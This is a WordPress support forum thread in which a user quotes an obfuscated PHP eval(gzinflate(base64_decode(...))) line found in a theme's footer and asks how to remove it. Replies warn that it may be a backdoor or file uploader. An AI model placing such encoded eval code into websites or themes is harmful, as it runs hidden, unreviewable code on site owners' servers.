WordPress.org

Ready to get started?Download WordPress

Forums

Weird Code in Footer - Cant change or move (4 posts)

  1. skinnylizard
    Member
    Posted 6 years ago #

    Hi,

    I am using a theme by Alice - Grafixx and there is a weird code in the footer

    which looks like this below.

    <? eval(gzinflate(base64_decode('
    fZBPS8QwEMXvhX6H2Ry8tbmvbWUR8bqHBY+SNNMm2DZhMmy2fnr7R0VQvIQh782bH++hybM8qw5FAY9+YpwY4GkyCEWxKYumCSLPA9aiHVDREbRnK0Dum8ZdwZladN4zklg+zz4hoQE9Q6XAEna1sMzhKGVKqUyeTCCMsfTUSwGsqEeuxase1PQmmpcvvZKquZt0DPf7C3l2sTjiX8FqcC0WPanO3W6lwd+xp83xvDvWaDhRa931H9DA67modl/Z+nHFdbxW8U0J7y7Ap2WBP8PGuMEv7cilnr2nH5P2Zt5Ey+PQfAA=
    '))); ?>

    i think it pertains to the credits section. what i was trying to do was move the credits on to a separate credits page with the names of the other contributors etc and have a clean front page.

    Unfortunately, when i tried to erase the code it gave errors and changed the colours of the main page.

    Would appreciate some help.

    cheers,
    skinny.

  2. maerk
    Member
    Posted 6 years ago #

    That's almost definitely a hacking attempt.

    Stop using the theme immediately and delete all the theme files.

    eval() takes a string and executes it as PHP, which means people can encode PHP (as they have done here) so that it looks like nonsense. It is probably a file uploader, which means that someone can put any kind of file they like on your server.

    I had this a while ago and someone had put a mailer script on my hosting, which sent out loads of emails automatically so my hosting shut down my site for a while.

    Download the theme again and search through it. If you find the eval() there then don't ever use it again. But if not you'll be able to use the clean version of the files. Definitely contact the theme author and tell them there's a vulnerability in the theme and explain what you've found.

  3. boober
    Member
    Posted 6 years ago #

    its not a hack attempt, its a slimey theme. Get rid of it. Next time, get your theme from a reputable place.

  4. skinnylizard
    Member
    Posted 6 years ago #

    hi,

    Thank you for the replies.

    Maerk, it is not a hack attempt as i kept a copy of the downloaded zip file of the theme and double checked against that. so the original theme is like that.

    boober, i dont know enough about these things. is there anyway to salvage it? i put in some time and effort on the theme before i discovered the problem. besides the theme looks perfect now, would be a damn shame..

    thanks again.

    cheers,
    Skinny.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.